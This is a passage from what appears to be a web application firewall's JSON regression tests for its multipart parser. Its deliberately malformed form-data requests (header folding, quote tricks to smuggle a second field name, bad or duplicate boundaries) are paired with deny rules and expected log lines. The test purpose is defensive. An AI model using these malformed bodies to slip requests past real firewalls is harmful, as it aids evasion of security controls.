"uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Part missing Content-Disposition header" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser error (bad disposition)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data name=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Invalid Content-Disposition header" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser error (no disposition name)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data;\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data;\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Content-Disposition header missing name field" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser error (no disposition name)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - ":\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"nvalid part header \\(header name missing\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (part header folding - space)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data;\r\n", - " name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data;\r\n", - " name=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"name: a.*variable: 1.*" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", - "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", - "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (part header folding - tab)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data;\r\n", - " name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data;\r\n", - " name=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"name: a.*variable: 1.*" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", - "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", - "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (part header folding - mixed)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data;\r\n", - " name=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"name: a.*variable: 1.*" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", - "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", - "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (part header folding - invalid)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data;\r\n", - "\fname=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"name: a.*variable: 1.*" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", - "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", - "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500076\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (part header folding - mixed invalid)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data;\r\n", - "\f\tname=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"name: a.*variable: 1.*" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", - "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", - "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500076\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (data after final boundary)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646--\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"name: a.*variable: 1.*", - "http_code": 403 - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_DATA_AFTER \"@eq 1\" \"phase:2,deny,status:403,id:500074\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (C-D uses single quotes)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=';filename=\"dummy';name=b;\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Duplicate Content-Disposition name", - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_INVALID_QUOTING \"!@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (invalid C-T boundary separator - comma)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data, boundary=0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Invalid boundary in C-T \\(malformed\\)", - "http_code": 403 - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (invalid C-T boundary separator - space)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data boundary=0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403 - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (invalid C-T boundary parameter name - case)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; bOundAry=0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Invalid boundary in C-T \\(case sensitivity\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (invalid C-T boundary parameter name - trailing chars)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary123=0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Invalid boundary in C-T \\(parameter name\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (multiple C-T boundaries - first quoted)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=\"0000\"; boundary=1111", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Multiple boundary parameters in C-T" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (multiple C-T boundaries - comma separated)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=0000, boundary=1111", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "Multiple boundary parameters in C-T" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (boundary whitespace in C-T - after name)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary =0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403 - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (boundary whitespace in C-T - before value)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary= 0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "boundary whitespace in C-T header" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (boundary whitespace in C-T - after value) - apache removes the whitespace, not the case for us... TODO", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=0000 ", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403 - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (boundary special char - trailing whitespace+token)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=0000 1111", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r\n", - "Content-Disposition: form-data; name=\"name\"\r\n", - "\r\n", - "Brian Rectanus\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"email\"\r\n", - "\r\n", - "brian.rectanus@breach.com\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n", - "Content-Type: image/jpeg\r\n", - "\r\n", - "BINARYDATA\r\n", - "--0000--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log": "No boundaries found in payload" - }, - "rules":[ - "SecRuleEngine 